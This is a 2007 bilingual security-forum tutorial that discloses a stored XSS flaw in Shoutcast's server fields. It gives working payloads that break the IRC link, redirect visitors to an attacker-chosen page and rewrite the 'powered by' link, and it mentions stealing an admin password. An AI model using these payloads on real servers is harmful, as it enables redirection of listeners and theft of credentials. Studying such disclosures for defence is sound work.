-----------------------------------------------------------------------------
#
Konu	: Shoutcast Radio Server
Tarih	: 09/02/2007
Saat	: 10:55 
Yazar	: Khalsa & Storm
#
-----------------------------------------------------------------------------

[Türkçe] 
merhaba arkadaşlar. 
shoutcast'teki yeni bir acik bulduk, bu acikin sebebi, radio server'a yollanan description başlığındaki yetersiz filitreleme. ayni sekilde irc, icq, aim,url,genre başlıkları 
ndada yetersiz filitrelemeden kaynaklanan bir açık. 
bu açık sayesinde server Üzerinde istediğimiz kodlari caliştirabiliyoruz. (xss ( cross site scripting)). 
simdi siz, tamam biz bununla ne yapabiliriz diye d?ş?n?yorsanız anlatayim. 
bununla en basitinden, shotcast'e bağlandıklarında farkli bir sayfada goruntuleme yapabilirsiniz. kendi radio sunucunuzmuş gibilerinden, 
daha sonrasında irc kanak tag'ina yazilan ad, choutcast server'ina bağlanti sağlamakta, biz bunu engeleyebiliriz bu acik sayesinde. 
powered by shoutcast linkini değiştirebiliriz. eğer djlik yaptiğimiz bi radio ise admin password'unu calabiliriz vs vs. 

simdi ilk olarak irc kanal edit'ini göstereceğim. 
bunun icin irc kismindaki alana sunu ekleyin: 

Code: 
<!-- "</a> bunu var olan bağlanti tag'ini kapatmak icin kullaniyoruz" --> 
</a>#Khalsa 
Şimdi Radio Serverin Ana Sayfasina Baktiğinizda irc Kanal Bağlantısının Olmadığını Fark Edeceksiniz.... 

Şimdide Sayfa Yonlendirmeye Bakalim: 
mesala description kısmına şu script'i ekleyelim 

Code: 
<script>window.setTimeout("window.location.replace('http://sitenizinismi/radio.html')", 0000);</script> 
bu script'i eklediğimizde radio server'in ana sayfasina bağlandiğinizda sizi site ismi olarak belirtmiş olduğunuz yere, radio.html'e yonelndirmiş olacaktir.bunu kendi 
kafaniza gore tasarladiğiniz bir sayafaya gore uyarlabilirsiniz... 
mesala simdide powered by linkine bakalim nasil değiştirebiliriz. 
ben sayfayi inceledim, ve powered by shoutcast link'inin taginda id belirlendiğini g?rd?m. bunun sayesinde linki kafama gore uyarliyabiliryorum. 
bunun icin javascriptin getelementbyid fonksyionunu kullandim ve Sayfa icersinde soyle bir arama yapaparak linki yeniledim: 

Code: 
<script>var bul = document.getElementById("ltv").href="test";</script> 
bunu da description kismina eklediğinizde sayfanin powered by yazisindaki linkin test olarak değiştiğini göreceksiniz... 
Yani anlayacağinmiz giden verilerdeki yetersiz filitreleme yüzünden server Üzerinde script caliştirabiliyoruz... 
benden bu kadar umarim anladiniz 
video izle : http://rapidshare.com/files/15624794/ShoutCast_Xss-Found_By_Khalsa_yoyo_.rar.html
[English] 
hi fellows; 

we found a new bug on shoutcast caused by the weak filter on the description title that is sent to the radio server. as well as irc, icq, aim,url, genre titles with the the weak filters. 
with this bug, we can run any code we want on the server. (xss (cross site scripting)) 
if you're saying, ok what do we do with this? let me explain.. 
when they connect to shoutcast, you can view it on a different page, just like our radio host.and then, the name that is written on the 
irc tag, lets us connect to shoutcast server, we can block this with the bug. we can change the url of powered by shoutcast. if that's 
a radio station that we're dj in, we can steal the admin's password. 

now i will show you the editing of the irc channel. 
to do it, add this to the part which says irc: 

Code: 
<!-- "</a> we use this to close down the connection tag" --> 
</a>#Khalsa 
now, when you look athe the main page of radio server, you will notice there is no connection to irc channel. 

now let's look at how to direct the page. 
for example, you can add this script to the description part. 

Code: 
<script>window.setTimeout("window.location.replace('http://TheNameOfYourWebPage/radio.html')", 0000);</script> 
when we add this this script and connect to the main page of radio server, it will direct you to the radio.html, which you defined 
as your webpage. you can direct it to any webpage you designed. 
now let's look at how to change the link of powered by link. 
i looked at the page, and saw that there was an id set on the tag of powered by shoutcast link. with that, i can change the link as i wish. 
to do this, i used the getelementbid function in javascript and renewed the link 
like this, by searching around on the webpage: 

Code: 
<script>var bul = document.getElementById("ltv").href="test";</script> 
when you add this in the description part, you will notice that the link of powered by on the webpage, will be changed as a testing. 

as you can understand, from weakness of the filter in which the data that is sent, you can run the scripts on the server. 
that's all from me, i hope you get it. 

watch video : http://rapidshare.com/files/15624794/ShoutCast_Xss-Found_By_Khalsa_yoyo_.rar.html

----------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------
Bu Ders  Storm Ve Khalsa Tarafindan www.turksecuritymaster.com Kullanıcıları İçin Hazırlanmiştir.
=========================
This lesson powered by storm and khalsa for www.turksecuritymaster.com members.